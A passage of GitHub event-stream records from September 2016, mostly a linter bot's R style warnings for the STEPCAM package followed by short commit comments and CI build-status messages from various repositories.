^\n```\n[R/generateArtificialData.R:40:31:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L40) *style:* **Put spaces around all infix operators.**\n```r\n​\t  if(mechanism_random == TRUE){\n                             ~^~~\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:29:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for (j in 1:n_traits) {\n^\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for (k in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:24:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L44) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:44:48:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L44) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:46:17:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for (j in 1:n_traits) {\n                ^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:47:19:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L47) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for (k in 1:pool_richness) {\n                  ^\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:48:25:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:48:28:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L48) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:48:31:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:48:36:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:44:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * \n^\n```\n[R/generateArtificialData.R:52:31:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:52:65:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                              traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:53:30:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n```\n[R/generateArtificialData.R:53:49:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:55:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L55) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n^\n```\n[R/generateArtificialData.R:55:16:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L55) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L56) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       max(trait_distances_onedimen)) + 10 ^ -99\n^\n```\n[R/generateArtificialData.R:56:43:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * \n                                         ~^~~\n```\n[R/generateArtificialData.R:56:71:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L56) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * \n                                                                      ^\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:59:27:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L59) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n                         ~^~~\n```\n[R/generateArtificialData.R:59:31:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L59) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n                              ^\n```\n[R/generateArtificialData.R:59:51:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L59) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n                                                  ^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:60:63:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       max(trait_distances_onedimen)) + 10 ^ -99\n                                                              ^~\n```\n[R/generateArtificialData.R:61:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L61) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:61:29:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) {\n^\n```\n[R/generateArtificialData.R:64:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L64) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:67:11:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L67) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) {\n          ^\n```\n[R/generateArtificialData.R:67:58:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L67) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) {\n                                                        ~^~~\n```\n[R/generateArtificialData.R:68:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L68) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L71) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:71:14:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:71:62:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:72:11:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L72) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n          ^\n```\n[R/generateArtificialData.R:72:58:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n                                                        ~^\n```\n[R/generateArtificialData.R:72:58:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n                                                         ^\n```\n[R/generateArtificialData.R:73:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L73) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(\n^\n```\n[R/generateArtificialData.R:74:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L74) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                      cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:75:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L75) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:77:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L77) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(\n^\n```\n[R/generateArtificialData.R:77:26:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(\n                        ~^~~\n```\n[R/generateArtificialData.R:78:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L78) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t            as.numeric(as.matrix(comm_spec_matrix[,-ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:79:33:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:81:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L81) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n[R/generateArtificialData.R:81:15:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L81) *style:* **Put spaces around all infix operators.**\n```r\n​\tplots <- as.data.frame(matrix(\n             ~^~~\n```\n[R/generateArtificialData.R:83:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L83) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n^\n```\n[R/generateArtificialData.R:84:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L84) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                traits_pool_df[ ,c(2:ncol(traits_pool_df))])\n^\n```\n[R/generateArtificialData.R:85:22:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L85) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n                    ~^~~\n```\n[R/generateArtificialData.R:86:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L86) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n^\n```\n[R/generateArtificialData.R:87:53:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n                                                   ~^~~\n```\n[R/generateArtificialData.R:88:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L88) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:89:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L89) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots)\n^\n```\n[R/generateArtificialData.R:90:13:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L90) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n            ^\n```\n[R/generateArtificialData.R:91:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/generateArtificialData.R#L91) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(output)\n^\n```\n"}},"created_at":"2016-09-21T16:27:30Z"}
{"id":"4597390256","type":"CommitCommentEvent","actor":{"login":"damon-atkins"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19116593,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-21T16:27:35Z","updated_at":"2016-09-21T16:27:35Z","body":"Is the `import copy` still needed in states/pkg.py"}},"created_at":"2016-09-21T16:27:35Z"}
{"id":"4597392065","type":"CommitCommentEvent","actor":{"login":"colbycheeze"},"repo":{"name":"IBM-Bluemix/logistics-wizard-webui"},"payload":{"comment":{"id":19116599,"position":27,"line":85,"path":"src/modules/demos.js","commit_id":"f78586d209bb4d7256ff23b0ae158435b5662ea6","created_at":"2016-09-21T16:27:54Z","updated_at":"2016-09-21T16:27:54Z","body":"Makes sense. Basically what we could do is just log in to every user associated with the demo session and store the tokens within the user object, instead of outside of it within the 'demoSession' object.\r\n\r\nThen we can just make sure to use the \"loggedIn\" user's token when making any calls which require the token being passed."}},"created_at":"2016-09-21T16:27:54Z"}
{"id":"4597403335","type":"CommitCommentEvent","actor":{"login":"dg"},"repo":{"name":"nette/di"},"payload":{"comment":{"id":19116615,"position":8,"line":89,"path":"src/DI/PhpReflection.php","commit_id":"5adb374d919c57a84491d1fde5f3b119fd55bd05","created_at":"2016-09-21T16:29:53Z","updated_at":"2016-09-21T16:29:53Z","body":"From the viewpoint of nette/di are dead."}},"created_at":"2016-09-21T16:29:53Z"}
{"id":"4597406942","type":"CommitCommentEvent","actor":{"login":"LipingMao"},"repo":{"name":"lmdaly/kuryr-libnetwork"},"payload":{"comment":{"id":19116633,"position":null,"line":null,"path":null,"commit_id":"1dc895a6d8bfaa03c0dd5cfb2d3e23e2e948a67c","created_at":"2016-09-21T16:30:28Z","updated_at":"2016-09-21T16:30:28Z","body":"Cool! Louise.\r\n\r\nJust a reminder if you use allowed address pairs here, do not forget to update max_allowed_address_pair in neutron, by default it is allow 10 allowed address pairs for one port. This means you can only create less then 10 containers on one vm by default.\r\n\r\nThis limitation is for security, if there is no limitation, end user can attack compute node by adding huge number of allowed address pairs. \r\n\r\nneutron/extensions/allowedaddresspairs.py \r\nallowed_address_pair_opts = [\r\n    #TODO(limao): use quota framework when it support quota for attributes\r\n    cfg.IntOpt('max_allowed_address_pair', default=10,\r\n               help=_(\"Maximum number of allowed address pairs\")),\r\n]\r\n"}},"created_at":"2016-09-21T16:30:28Z"}
{"id":"4597407946","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19116638,"position":null,"line":null,"path":null,"commit_id":"c6aac28c6b9f6c2f2d7278603ade60af3fa529b2","created_at":"2016-09-21T16:30:38Z","updated_at":"2016-09-21T16:30:38Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1090](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13824&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-21T16:30:38Z"}
{"id":"4597407964","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19116639,"position":null,"line":null,"path":null,"commit_id":"e9c8478e48d40b3816ddf92b3d0604013ab04d06","created_at":"2016-09-21T16:30:38Z","updated_at":"2016-09-21T16:30:38Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1091](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13823&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-21T16:30:38Z"}
{"id":"4597409408","type":"CommitCommentEvent","actor":{"login":"heatherbradfield"},"repo":{"name":"heatherbradfield/AnimalSounds"},"payload":{"comment":{"id":19116642,"position":null,"line":null,"path":null,"commit_id":"c5e6f9ccbcb447145a314582a298f8bbd010a9c1","created_at":"2016-09-21T16:30:53Z","updated_at":"2016-09-21T16:30:53Z","body":"I can try to use your instructions panel though."}},"created_at":"2016-09-21T16:30:53Z"}
{"id":"4597414591","type":"CommitCommentEvent","actor":{"login":"dbrgn"},"repo":{"name":"saltyrtc/saltyrtc-meta"},"payload":{"comment":{"id":19116652,"position":null,"line":null,"path":null,"commit_id":"312878823300d84e5279dc9a46e16c58c12c77d8","created_at":"2016-09-21T16:31:46Z","updated_at":"2016-09-21T16:31:46Z","body":"Could we change that to a *SHOULD*? It's not something critical at all."}},"created_at":"2016-09-21T16:31:46Z"}
{"id":"4597414728","type":"CommitCommentEvent","actor":{"login":"gwvo"},"repo":{"name":"adsharma/flatbuffers"},"payload":{"comment":{"id":19116653,"position":7,"line":383,"path":"include/flatbuffers/flatbuffers.h","commit_id":"51f46e430b39fe9a0cc0817918e2cb3b5e72b8d7","created_at":"2016-09-21T16:31:48Z","updated_at":"2016-09-21T16:31:48Z","body":"`virtual` cannot work: `Vector` is a class that is made to point to FlatBuffer data."}},"created_at":"2016-09-21T16:31:48Z"}
{"id":"4597415928","type":"CommitCommentEvent","actor":{"login":"louaybassbouss"},"repo":{"name":"tidoust/presentation-api-testcoverage"},"payload":{"comment":{"id":19116658,"position":null,"line":null,"path":null,"commit_id":"c9619fcd98549fcf2b956f9714fcf9ff93e9b986","created_at":"2016-09-21T16:31:59Z","updated_at":"2016-09-21T16:31:59Z","body":"Thx @tidoust LGTM"}},"created_at":"2016-09-21T16:31:59Z"}
{"id":"4597418070","type":"CommitCommentEvent","actor":{"login":"nfalco79"},"repo":{"name":"jenkinsci/nodejs-plugin"},"payload":{"comment":{"id":19116662,"position":null,"line":null,"path":null,"commit_id":"f38e0a5d20a747d235dd1c439ebb92eef4b0fe8f","created_at":"2016-09-21T16:32:21Z","updated_at":"2016-09-21T16:32:21Z","body":"Ok I found the issue.\r\nThe code of  ndeloof is correct. In my case the issue is due the envinject plugin that with the EnvInjectPluginAction#buildEnvVars() overrides the enhanced enviroment with own (empty from scratch), also if the plugin in the job configuration is off."}},"created_at":"2016-09-21T16:32:21Z"}
{"id":"4597418359","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19116664,"position":null,"line":null,"path":null,"commit_id":"b329dd8df459bcee9c3338cf6de5097b44bf53d5","created_at":"2016-09-21T16:32:25Z","updated_at":"2016-09-21T16:32:25Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.250.b329dd8df459bcee9c3338cf6de5097b44bf53d5](http://build.palaso.org/viewLog.html?buildId=77012&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1496, ignored: 17 Build time: 00:07:31"}},"created_at":"2016-09-21T16:32:25Z"}
{"id":"4597423963","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19116676,"position":null,"line":null,"path":null,"commit_id":"c6aac28c6b9f6c2f2d7278603ade60af3fa529b2","created_at":"2016-09-21T16:33:21Z","updated_at":"2016-09-21T16:33:21Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1090](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13824&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Compilation error: Scala compiler (new) Build time: 00:02:43"}},"created_at":"2016-09-21T16:33:21Z"}
{"id":"4597424475","type":"CommitCommentEvent","actor":{"login":"gwvo"},"repo":{"name":"adsharma/flatbuffers"},"payload":{"comment":{"id":19116677,"position":6,"line":56,"path":"include/flatbuffers/idl.h","commit_id":"51f46e430b39fe9a0cc0817918e2cb3b5e72b8d7","created_at":"2016-09-21T16:33:26Z","updated_at":"2016-09-21T16:33:26Z","body":"Adding types here has huge consequences for a lot of code (in many languages) that now needs to support this or safely ignore it. We likely won't want to do this."}},"created_at":"2016-09-21T16:33:26Z"}
